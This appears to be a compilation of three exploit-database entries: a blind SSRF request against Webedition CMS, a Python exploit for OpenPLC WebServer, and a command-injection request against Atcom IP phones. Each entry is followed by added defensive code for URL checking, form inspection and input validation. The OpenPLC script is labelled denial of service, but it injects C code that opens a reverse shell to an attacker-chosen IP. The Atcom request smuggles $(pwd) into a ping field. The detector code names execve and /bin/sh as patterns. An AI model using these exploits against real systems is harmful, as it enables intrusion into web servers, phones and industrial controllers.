<pre><code>Exploit Title: Webedition CMS v2.9.8.8 - Blind SSRF<br />Application: Webedition CMS<br />Version: v2.9.8.8<br />Bugs: Blind SSRF<br />Technology: PHP<br />Vendor URL: https://www.webedition.org/<br />Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1<br />Date found: 07.09.2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux<br /><br /><br />2. Technical Details & POC<br />========================================<br />The widgetGetRss RPC handler (rpc.php?cmd=widgetGetRss&mod=rss) fetches the feed URL passed in the we_cmd[0] parameter without restricting it. Supplying an attacker-controlled URL such as https://YOUR-SERVER/test.xml in we_cmd[0] makes the webEdition server request it; the same parameter can name an internal host instead. The SSRF is blind: the fetched content is not reflected to the client, but the outbound request can be observed on the attacker's server. The request below requires a valid backend session (the WESESSION cookie).<br /><br />PoC request<br /><br />POST /webEdition/rpc.php?cmd=widgetGetRss&mod=rss HTTP/1.1<br />Host: localhost<br />Content-Length: 141<br />sec-ch-ua: <br />Accept: application/json, text/javascript, */*; q=0.01<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36<br />sec-ch-ua-platform: ""<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/webEdition/index.php?we_cmd[0]=startWE<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: treewidth_main=300; WESESSION=41a9164e60666254199b3ea1cd3d2e0ad969c379; cookie=yep; treewidth_main=300<br />Connection: close<br /><br />we_cmd[0]=https://YOU-SERVER/test.xml&we_cmd[1]=111000&we_cmd[2]=0&we_cmd[3]=110000&we_cmd[4]=&we_cmd[5]=m_3<br /><br /></code></pre>
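The rpc.php call above fetches whatever URL it is handed. The Python below is an added example of the server-side check such a fetcher needs before it connects; it is not webEdition's code. It rejects non-http(s) schemes and embedded credentials, resolves the host and refuses any answer that is loopback, private, link-local (which covers the cloud metadata address 169.254.169.254), multicast, reserved or an IPv4-mapped IPv6 address hiding one of those, and it returns the validated addresses so the caller can connect to them directly instead of resolving a second time. The FAKE_DNS table and the host names in it are constructed so the block runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed lookup table so the example runs without network access;
# rebind.example models a host that also resolves to an internal address.
FAKE_DNS = {
    "attacker.example": ["8.8.8.8"],
    "internal.example": ["10.0.0.5"],
    "rebind.example": ["8.8.8.8", "127.0.0.1"],
}


def fake_resolver(host):
    return FAKE_DNS.get(host, [host])  # IP literals resolve to themselves


def system_resolver(host):
    # Real resolver: every A/AAAA answer, because a single bad one is enough.
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_public_address(ip_text):
    addr = ipaddress.ip_address(ip_text)
    # ::ffff:10.0.0.1 is an IPv4-mapped IPv6 address; judge the inner IPv4.
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def check_fetch_url(url, resolver=system_resolver):
    """Validate a user-supplied URL; return the addresses the fetch may use."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme {parts.scheme!r} not allowed")
    if not parts.hostname:
        raise ValueError("URL has no host")
    if parts.username is not None or parts.password is not None:
        raise ValueError("credentials in URL")
    addresses = resolver(parts.hostname)
    if not addresses:
        raise ValueError("host does not resolve")
    for ip in addresses:
        if not is_public_address(ip):
            raise ValueError(f"{parts.hostname} resolves to non-public {ip}")
    # Connect to one of these addresses (pin it); do not resolve again, and
    # re-run this check on every redirect the fetch follows.
    return addresses
```

Returning the validated addresses matters: a check that passes and a fetch that then resolves the name again leaves a window for DNS rebinding, so the HTTP client should be pointed at the pinned address (with the original Host header) and redirects must go through `check_fetch_url` as well.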
<pre><code># Exploit Title: OpenPLC WebServer 3 - Denial of Service<br /># Date: 10.09.2023<br /># Exploit Author: Kai Feng<br /># Vendor Homepage: https://autonomylogic.com/<br /># Software Link: https://github.com/thiagoralves/OpenPLC_v3.git<br /># Version: Version 3 and 2<br /># Tested on: Ubuntu 20.04<br /><br /><br />import requests<br />import sys<br />import time<br />import optparse<br />import re<br /><br />parser = optparse.OptionParser()<br />parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://target-uri:8080)")<br />parser.add_option('-l', '--user', action="store", dest="user", help="User credential to login")<br />parser.add_option('-p', '--passw', action="store", dest="passw", help="Pass credential to login")<br />parser.add_option('-i', '--rip', action="store", dest="rip", help="IP for Reverse Connection")<br />parser.add_option('-r', '--rport', action="store", dest="rport", help="Port for Reverse Connection")<br /><br />options, args = parser.parse_args()<br />if not options.url:<br /> print('[+] Remote Code Execution on OpenPLC_v3 WebServer')<br /> print('[+] Specify an url target')<br /> print("[+] Example usage: exploit.py -u http://target-uri:8080 -l admin -p admin -i 192.168.1.54 -r 4444")<br /> exit()<br /><br />host = options.url<br />login = options.url + '/login'<br />upload_program = options.url + '/programs'<br />compile_program = options.url + '/compile-program?file=681871.st'<br />run_plc_server = options.url + '/start_plc'<br />user = options.user<br />password = options.passw<br />rev_ip = options.rip<br />rev_port = options.rport<br />x = requests.Session()<br /><br />def auth():<br /> print('[+] Remote Code Execution on OpenPLC_v3 WebServer')<br /> time.sleep(1)<br /> print('[+] Checking if host '+host+' is Up...')<br /> # The GET has to be inside the try block; otherwise a connection error is<br /> # never caught and the "host seems to be down" branch can never run.<br /> try:<br />  host_up = x.get(host)<br />  if host_up.status_code == 200:<br />   print('[+] Host Up! ...')<br /> except requests.RequestException:<br />  print('[+] This host seems to be down :( ')<br />  sys.exit(0)<br /><br /> print('[+] Trying to authenticate with credentials '+user+':'+password+'')<br /> time.sleep(1)<br /> submit = {<br />  'username': user,<br />  'password': password<br /> }<br /> x.post(login, data=submit)<br /> response = x.get(upload_program)<br /><br /> # The full /programs page is only rendered for a logged-in session.<br /> if len(response.text) > 30000 and response.status_code == 200:<br />  print('[+] Login success!')<br />  time.sleep(1)<br /> else:<br />  print('[x] Login failed :(')<br />  sys.exit(0)<br /><br />def injection():<br /> print('[+] PLC program uploading... ')<br /> upload_url = host + "/upload-program"<br /> upload_cookies = {"session": ".eJw9z7FuwjAUheFXqTx3CE5YInVI5RQR6V4rlSPrekEFXIKJ0yiASi7i3Zt26HamT-e_i83n6M-tyC_j1T-LzXEv8rt42opcIEOCCtgFysiWKZgic-otkK2XLr53zhQTylpiOC2cKTPkYt7NDSMlJJtv4NcO1Zq1wQhMqbYk9YokMSWgDgnK6qRXVevsbPC-1bZqicsJw2F2YeksTWiqANwkNFsQXdSKUlB16gIskMsbhF9_9yIe8_fBj_Gj9_3lv-Z69uNfkvgafD90O_H4ARVeT-s.YGvgPw.qwEcF3rMliGcTgQ4zI4RInBZrqE"}<br /> upload_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------210749863411176965311768214500", "Origin": host, "Connection": "close", "Referer": host + "/programs", "Upgrade-Insecure-Requests": "1"}<br /> upload_data = "-----------------------------210749863411176965311768214500\r\nContent-Disposition: form-data; name=\"file\"; filename=\"program.st\"\r\nContent-Type: application/vnd.sailingtracker.track\r\n\r\nPROGRAM prog0\n VAR\n var_in : BOOL;\n var_out : BOOL;\n END_VAR\n\n var_out := var_in;\nEND_PROGRAM\n\n\nCONFIGURATION Config0\n\n RESOURCE Res0 ON PLC\n TASK Main(INTERVAL := T#50ms,PRIORITY := 0);\n PROGRAM Inst0 WITH Main : prog0;\n 
END_RESOURCE\nEND_CONFIGURATION\n\r\n-----------------------------210749863411176965311768214500\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\nUpload Program\r\n-----------------------------210749863411176965311768214500--\r\n"<br /> upload = x.post(upload_url, headers=upload_headers, cookies=upload_cookies, data=upload_data)<br /><br /> act_url = host + "/upload-program-action"<br /> act_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------374516738927889180582770224000", "Origin": host, "Connection": "close", "Referer": host + "/upload-program", "Upgrade-Insecure-Requests": "1"}<br /> act_data = "-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_name\"\r\n\r\nprogram.st\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_descr\"\r\n\r\n\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_file\"\r\n\r\n681871.st\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"epoch_time\"\r\n\r\n1617682656\r\n-----------------------------374516738927889180582770224000--\r\n"<br /> upload_act = x.post(act_url, headers=act_headers, data=act_data)<br /> time.sleep(2)<br /><br />def connection():<br /> print('[+] add device...')<br /> inject_url = host + "/add-modbus-device"<br /> # inject_dash = host + "/dashboard"<br /> inject_cookies = {"session": 
".eJw9z7FuwjAUheFXqTx3CE5YInVI5RQR6V4rlSPrekEFXIKJ0yiASi7i3Zt26HamT-e_i83n6M-tyC_j1T-LzXEv8rt42opcIEOCCtgFysiWKZgic-otkK2XLr53zhQTylpiOC2cKTPkYt7NDSMlJJtv4NcO1Zq1wQhMqbYk9YokMSWgDgnK6qRXVevsbPC-1bZqicsJw2F2YeksTWiqANwkNFsQXdSKUlB16gIskMsbhF9_9yIe8_fBj_Gj9_3lv-Z69uNfkvgafD90O_H4ARVeT-s.YGvyFA.2NQ7ZYcNZ74ci2miLkefHCai2Fk"}<br /> inject_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0", "Accept": "/text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------169043028319378579443281515639", "Origin": host, "Connection": "close", "Referer": host + "/add-modbus-device", "Upgrade-Insecure-Requests": "1"}<br /> inject_data = "-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_name\"\r\n\r\n122222222222222222222222222222222222211111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; 
name=\"device_protocol\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; 
name=\"device_id\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_ip\"\r\n\r\n#11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111<br /> <br /> <br /> <br /> <br /> <br /> <br 
/> <br /> # \"ladder.h\"\r\n#include <stdio.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n\r\n\r\n//-----------------------------------------------------------------------------\r\n\r\n//-----------------------------------------------------------------------------\r\nint ignored_bool_inputs[] = {-1};\r\nint ignored_bool_outputs[] = {-1};\r\nint ignored_int_inputs[] = {-1};\r\nint ignored_int_outputs[] = {-1};\r\n\r\n//-----------------------------------------------------------------------------\r\n\r\n//-----------------------------------------------------------------------------\r\nvoid initCustomLayer()\r\n{\r\n \r\n \r\n \r\n}\r\n\r\n\r\nvoid updateCustomIn()\r\n{\r\n\r\n}\r\n\r\n\r\nvoid updateCustomOut()\r\n{\r\n int port = "+rev_port+";\r\n struct sockaddr_in revsockaddr;\r\n\r\n int sockt = socket(AF_INET, SOCK_STREAM, 0);\r\n revsockaddr.sin_family = AF_INET; \r\n revsockaddr.sin_port = htons(port);\r\n revsockaddr.sin_addr.s_addr = inet_addr(\""+rev_ip+"\");\r\n\r\n connect(sockt, (struct sockaddr *) &revsockaddr, \r\n sizeof(revsockaddr));\r\n dup2(sockt, 0);\r\n dup2(sockt, 1);\r\n dup2(sockt, 2);\r\n\r\n char * const argv[] = {\"/bin/sh\", NULL};\r\n execve(\"/bin/sh\", argv, NULL);\r\n\r\n return 0; \r\n \r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n-----------------------------289530314119386812901408558722--\r\n"<br /> inject = x.post(inject_url, headers=inject_headers, cookies=inject_cookies, data=inject_data)<br /> time.sleep(3)<br /> # comp = x.get(compile_program)<br /> # time.sleep(6)<br /> # x.get(inject_dash)<br /> # time.sleep(3)<br /> # print('[+] Spawning Reverse Shell...')<br /> start = x.get(run_plc_server)<br /> time.sleep(1)<br /> if start.status_code == 200:<br /> print('[+] Reverse connection received!') <br /> sys.exit(0)<br /> else:<br /> print('[+] Failed to receive connection :(')<br /> sys.exit(0)<br /><br />auth()<br
/>injection()<br />connection()<br /><br /><br /></code></pre>
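The request above pushes C source (includes, a socket() call, execve("/bin/sh")) and extremely long values through the device_name, device_protocol, device_id and device_ip fields of an OpenPLC-style "add device" form. The following is an added defender-side example, not the exploit author's code and not OpenPLC's own code: it parses a multipart/form-data body and reports fields that carry native-code indicators or exceed a sane length, so it can be run over captured requests or placed in front of the form handler. The field names come from the request above; the sample bodies, the boundary string and the 256-character limit are constructed assumptions.

```python
"""Check an OpenPLC-style 'add device' multipart form for embedded native code.

Added example for illustration; this is not the exploit author's code or
OpenPLC's. It parses a multipart/form-data body and reports fields that look
like the injected request above (C source, shell spawning, oversized values).
The field names match that request; the bodies, boundary and length limit
are constructed/assumed.
"""
import re

# Indicators of native source or shell spawning inside a form value, taken
# from what is visible in the injected request above.
CODE_INDICATORS = (
    re.compile(r"#include\s*<"),
    re.compile(r"\bexecve\s*\("),
    re.compile(r"\bsocket\s*\(\s*AF_INET\b"),
    re.compile(r"/bin/sh"),
)
# Assumed upper bound for a device name/ID/protocol/IP value (hypothetical).
MAX_FIELD_LEN = 256


def parse_multipart(body: str, boundary: str) -> dict:
    """Minimal multipart/form-data parser; returns {field_name: value}.

    Only handles simple text fields (no file uploads, no nested multipart),
    which is all the device form carries.
    """
    fields = {}
    delimiter = "--" + boundary
    for part in body.split(delimiter):
        part = part.strip("\r\n")
        if not part or part == "--":      # preamble / closing delimiter
            continue
        headers, _, value = part.partition("\r\n\r\n")
        match = re.search(r'name="([^"]+)"', headers)
        if match:
            fields[match.group(1)] = value
    return fields


def inspect_fields(fields: dict) -> list:
    """Return (field, reason) findings; an empty list means nothing suspicious."""
    findings = []
    for name, value in fields.items():
        if len(value) > MAX_FIELD_LEN:
            findings.append((name, f"length {len(value)} exceeds {MAX_FIELD_LEN}"))
        for indicator in CODE_INDICATORS:
            if indicator.search(value):
                findings.append((name, f"matches {indicator.pattern}"))
                break
    return findings


def build_body(boundary: str, fields: dict) -> str:
    """Serialise simple text fields as multipart/form-data (for the samples)."""
    parts = [
        f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n'
        for name, value in fields.items()
    ]
    return "".join(parts) + f"--{boundary}--\r\n"


# Constructed samples: a normal device and one shaped like the request above.
BOUNDARY = "----ConstructedBoundary0001"
BENIGN_BODY = build_body(BOUNDARY, {
    "device_name": "pump-1",
    "device_protocol": "TCP",
    "device_id": "1",
    "device_ip": "192.0.2.10",
})
SUSPICIOUS_BODY = build_body(BOUNDARY, {
    "device_name": "1" * 400,
    "device_protocol": '#include <unistd.h>\r\nvoid updateCustomOut() { execve("/bin/sh", 0, 0); }',
    "device_id": "1",
    "device_ip": "192.0.2.10",
})

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("suspicious", SUSPICIOUS_BODY)):
        print(label, inspect_fields(parse_multipart(body, BOUNDARY)))
```

The length check matters independently of the signatures: a device name or IP field has no legitimate reason to carry hundreds of characters, so an upper bound rejects this class of request even when the embedded code uses indicators not in the list.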
<pre><code># Exploit Title: Atcom 2.7.x.x - Authenticated Command Injection<br /># Google Dork: N/A<br /># Date: 07/09/2023<br /># Exploit Author: Mohammed Adel<br /># Vendor Homepage: https://www.atcom.cn/<br /># Software Link: https://www.atcom.cn/html/yingwenban/Product/Fast_IP_phone/2017/1023/135.html<br /># Version: All versions above 2.7.x.x<br /># Tested on: Kali Linux<br /><br /><br />Exploit Request:<br /><br />POST /cgi-bin/web_cgi_main.cgi?user_get_phone_ping HTTP/1.1<br />Host: {TARGET_IP}<br />User-Agent: polar<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 49<br />Authorization: Digest username="admin", realm="IP Phone Web Configuration", nonce="value_here", uri="/cgi-bin/web_cgi_main.cgi?user_get_phone_ping", response="value_here", qop=auth, nc=value_here, cnonce="value_here"<br /><br />cmd=0.0.0.0$(pwd)&ipv4_ipv6=0&user_get_phone_ping<br /><br /><br />Response:<br /><br />{"ping_cmd_result":"cGluZzogYmFkIGFkZHJlc3MgJzAuMC4wLjAvdXNyL2xvY2FsL2FwcC9saWdodHRwZC93d3cvY2dpLWJpbicK","ping_cmd":"0.0.0.0$(pwd)"}<br /><br />The value of "ping_cmd_result" is encoded as base64. Decoding the value of "ping_cmd_result" reveals the result of the command executed as shown below:<br /><br />ping: bad address '0.0.0.0/usr/local/app/lighttpd/www/cgi-bin'<br /><br /></code></pre>
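The Atcom request above works because the cmd parameter is handed to a shell, so $(pwd) is expanded before ping ever sees it. The following is an added example, not the advisory author's code and not Atcom firmware code: it shows that vulnerable pattern next to a hardened handler that accepts only an IP address or hostname and builds an argv list (no shell), plus a helper that decodes the base64 ping_cmd_result field so a reviewer can read what the device returned. The target value and the response JSON are the ones quoted in the advisory; the function names and the hostname rule are assumptions.

```python
"""Validate a 'ping target' parameter instead of handing it to a shell.

Added example for illustration; this is not the advisory author's code or
Atcom firmware code. It places the vulnerable pattern behind the request
above (user input pasted into a shell command line) next to a hardened
version that accepts only an IP address or hostname and builds an argv list,
so metacharacters such as $(...) are never interpreted. It also decodes the
base64 'ping_cmd_result' field. The target value and the response JSON are
the ones quoted above; function names and the hostname rule are assumptions.
"""
import base64
import ipaddress
import re

# RFC 1123-style hostname: dot-separated alphanumeric labels, optional hyphens.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$"
)
SHELL_METACHARS = set("$`;|&()<>\n\r")


def unsafe_ping_command(target: str) -> str:
    """The vulnerable shape (do not use): the target is interpolated into a
    shell command string, so '0.0.0.0$(pwd)' has $(pwd) expanded by the shell."""
    return f"ping -c 1 {target}"


def validate_target(target: str):
    """Return the canonical IP/hostname, or None if the value is anything else."""
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    if HOSTNAME_RE.match(target):
        return target
    return None


def safe_ping_argv(target: str):
    """Hardened: validate, then build an argv list for subprocess.run(shell=False).
    Returns None when the target is rejected."""
    canonical = validate_target(target)
    if canonical is None:
        return None
    return ["ping", "-c", "1", canonical]


def injection_reason(target: str):
    """For logging/detection: the shell metacharacters that made a rejected
    target look like an injection attempt, or None if there were none."""
    if validate_target(target) is not None:
        return None
    found = sorted(SHELL_METACHARS & set(target))
    return "".join(found) or None


def decode_ping_result(response: dict) -> str:
    """Decode the base64 'ping_cmd_result' field of the CGI's JSON response."""
    return base64.b64decode(response["ping_cmd_result"]).decode("utf-8", "replace")


# Response quoted in the advisory above (the submitted target was '0.0.0.0$(pwd)').
ADVISORY_RESPONSE = {
    "ping_cmd_result": "cGluZzogYmFkIGFkZHJlc3MgJzAuMC4wLjAvdXNyL2xvY2FsL2FwcC9saWdodHRwZC93d3cvY2dpLWJpbicK",
    "ping_cmd": "0.0.0.0$(pwd)",
}

if __name__ == "__main__":
    for t in ("192.0.2.1", "phone.example.com", ADVISORY_RESPONSE["ping_cmd"]):
        print(t, "->", safe_ping_argv(t), injection_reason(t))
    print(decode_ping_result(ADVISORY_RESPONSE).rstrip())
```

Validation rather than escaping is the point: once the value is known to be an address or hostname and is passed as a separate argv element, there is nothing left for a shell to interpret, and the rejected value with its metacharacters is what to log for detection.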